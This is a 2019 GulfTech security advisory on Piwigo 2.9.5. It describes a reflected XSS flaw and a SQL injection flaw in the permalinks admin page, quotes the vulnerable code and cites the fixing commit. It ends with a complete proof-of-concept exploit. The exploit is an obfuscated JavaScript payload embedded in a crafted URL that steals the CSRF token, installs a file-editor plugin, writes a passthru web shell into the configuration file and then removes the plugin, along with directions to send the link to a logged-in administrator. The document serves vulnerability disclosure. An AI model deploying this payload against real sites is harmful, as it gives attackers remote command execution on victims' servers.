Piwigo 2.9.5 Cross Site Scripting / SQL Injection / Command Execution

`###########################################################################  
______ ____________ __   
/ ____/_ __/ / __/_ __/__ _____/ /_   
/ / __/ / / / / /_ / / / _ \/ ___/ __ \  
/ /_/ / /_/ / / __/ / / / __/ /__/ / / /   
\____/\__,_/_/_/ /_/ \___/\___/_/ /_/   
  
GulfTech Research and Development   
  
###########################################################################  
# Piwigo <= 2.9.5 Multiple Vulnerabilities #   
###########################################################################  
  
  
Released Date: 2019-09-22  
Last Modified: 2019-09-22  
Company Info: Piwigo.org  
Version Info:   
Vulnerable  
Piwigo <= 2.9.5  
  
  
--[ Table of contents  
  
00 - Introduction  
00.1 Background  
  
01 - Cross Site Scripting  
01.1 - Vulnerable code analysis  
01.2 - Remote exploitation  
  
02 - SQL Injection  
02.1 - Vulnerable code analysis  
02.2 - Remote exploitation  
  
03 - Credit  
  
04 - Solution  
  
05 - Contact information  
  
  
--[ 00 - Introduction  
  
The purpose of this article is to detail the vulnerabilities that I found   
in the Piwigo software.   
  
  
--[ 00.1 - Background  
  
Piwigo is a popular open source photo gallery application written in PHP.  
  
  
--[ 01 - Cross Site Scripting  
  
Piwigo is vulnerable to a XSS issue within the "permalinks" functionality.   
This vulnerability can be exploited by an attacker to execute arbitrary   
client side code within the context of the victim client.  
  
--[ 01.1 - Vulnerable code analysis  
  
The vulnerable code can be found within the "parse_sort_variables" function  
which is located in admin/permalinks.php and is as follows:  
  
$url_components = parse_url( $_SERVER['REQUEST_URI'] );  
  
$base_url = $url_components['path'];  
  
parse_str($url_components['query'], $vars);  
$is_first = true;  
foreach ($vars as $key => $value)  
{  
if (!in_array($key, $get_rejects) and $key!=$get_param)  
{  
$base_url .= $is_first ? '?' : '&';  
$is_first = false;  
$base_url .= $key.'='.urlencode($value);  
}  
}  
  
As we can see from the above code, the user supplied "REQUEST_URI" server  
variable is used to build the $base_url variable which is later displayed  
as a link to the end user. The problem with this code is that value data is  
urlencoded, but key data is unasanitized. This leads to a reflected XSS  
condition which could allow an attacker to force an authenticated admin  
user to perform malicious actions silently on the attackers behalf.  
  
--[ 01.2 - Remote exploitation  
  
The Javascript payload that I created was able to create a web shell on the   
remote host by taking the following steps once executed by an authenticated   
administrator.  
  
1] Gather "pwg_token" CSRF token  
2] Install LocalFilesEditor plugin  
3] Activate plugin  
4] Write shell to /local/config/config.inc.php  
5] De activate plugin  
6] Uninstall plugin  
7] Redirect user to the index page  
  
Exploitation of this issue is rather straight forward, but because   
variables in PHP can't have dots and spaces in their names so those are   
converted to underscores by the call to "parse_str" in the vulnerable code  
shown earlier. An attacker must adhere to these limitations whenever  
constructing XSS payloads.   
  
  
--[ 02 - SQL Injection  
  
Piwigo is vulnerable to an SQL Injection issue within the "permalinks"   
functionality. This vulnerability can be exploited by an attacker to execute   
arbitrary SQL statements.  
  
--[ 02.1 - Vulnerable code analysis  
  
The vulnerable code can be found located in the admin/permalinks.php file and is   
as follows:  
  
if ( isset($_POST['set_permalink']) and $_POST['cat_id']>0 )  
{  
check_pwg_token();  
$permalink = $_POST['permalink'];  
if ( empty($permalink) )  
delete_cat_permalink($_POST['cat_id'], isset($_POST['save']) );  
else  
set_cat_permalink($_POST['cat_id'], $permalink, isset($_POST['save']) );  
$selected_cat = array( $_POST['cat_id'] );  
}  
  
Both the "set_cat_permalink" and "delete_cat_permalink" functions rely on the   
"cat_id" variable already being sanitized. However, the only sanity checks that  
take place with "cat_id" are to make sure it is greater than zero. This is not  
sufficient as PHP type juggling will cast a string that starts with a number to   
a valid integer for the comparison, yet the original tainted value will remain.  
This allows an attacker to pass a string that starts with an integer in order to  
achieve SQL Injection.  
  
--[ 02.2 - Remote exploitation  
  
It seems an admin account is required to exploit this issue, so I did not bother  
with trying to write an exploit for this issue.  
  
--[ 03 - Credit  
  
James Bercegay  
GulfTech Research and Development  
  
  
--[ 04 - Solution  
  
The issue is addressed with the following commit.  
  
https://github.com/Piwigo/Piwigo/commit/7e154ab093546e5288221685c1f8bfec2382d09a  
  
This is scheduled for release 2.10.0.RC2  
  
  
--[ 05 - Contact information  
  
Web  
https://gulftech.org/  
  
Mail  
[email protected]  
  
  
Copyright 2019 GulfTech Research and Development. All rights reserved.  
  
  
---------------------------------------------------------------  
2019_piwigo_permalinks_xss_to_rce.php Proof of Concept exploit:  
  
<?php  
////////////////////////////////////////////////////////////////////////////////  
// Piwigo <= 2.9.5 XSS to RCE Proof of Concept   
// James Bercegay ( http://www.gulftech.org/ )  
////////////////////////////////////////////////////////////////////////////////  
  
// Start output buffering for JavaScript content  
ob_start();  
?>  
// BEGIN JAVASCRIPT  
  
// CSRF protection token  
var pwg = document.forms[0].pwg_token.value;  
  
// Webshell PHP code  
var php = "passthru(urldecode($_REQUEST['x']));";  
  
// LocalFilesEditor version info  
var rev = "6861";  
var ext = "144";  
  
// Build URL  
var url = "admin.php?page=plugins&tab=new&revision=" +  
rev +  
"&extension=" +  
ext +  
"&pwg_token=" + pwg;  
  
// Install plugin  
$.ajax({  
async: false,  
type: "GET",  
url: url  
});  
  
// Build URL  
var url = "admin.php?page=plugins&plugin=LocalFilesEditor&pwg_token=" +   
pwg +   
"&action=activate";  
  
// Activate plugin  
$.ajax({  
async: false,  
type: "GET",  
url: url,  
success: function (response) {  
  
// Build URL  
var url = "admin.php?page=plugin-LocalFilesEditor-localconf";  
  
// Keep space at the beginning of php payload. It's intentional.  
$.post( url, { pwg_token: pwg, text: " " + php, submit: "1" } );  
  
}});  
  
// Build URL  
var url = "admin.php?page=plugins&plugin=LocalFilesEditor&pwg_token=" +   
pwg +   
"&action=deactivate";  
  
// De Activate plugin  
$.ajax({  
async: false,  
type: "GET",  
url: url  
});  
  
// Build URL  
var url = "admin.php?page=plugins&plugin=LocalFilesEditor&pwg_token=" +  
pwg +   
"&action=delete";  
  
// Uninstall plugin   
$.ajax({  
async: false,  
type: "GET",  
url: url  
});  
  
// Redirect user  
document.location = "admin.php";  
  
// ENDED JAVASCRIPT  
<?php  
  
// Encode contents using base64 encoding. We do this because PHP strips certain   
// characters from key values, and will prevent loading javascript containing a   
// dot for example.  
$b64 = base64_encode(ob_get_clean());  
  
// Formatted URL  
$url = '/admin.php?page=permalinks&"><script>eval(atob("%s"));</script><a+"=1';  
  
// Output  
printf($url, urlencode($b64));  
printf("\nSend the above URL to a logged in administrator.");  
printf("\nShell will be located at: local/config/config.inc.php");  
?>  
`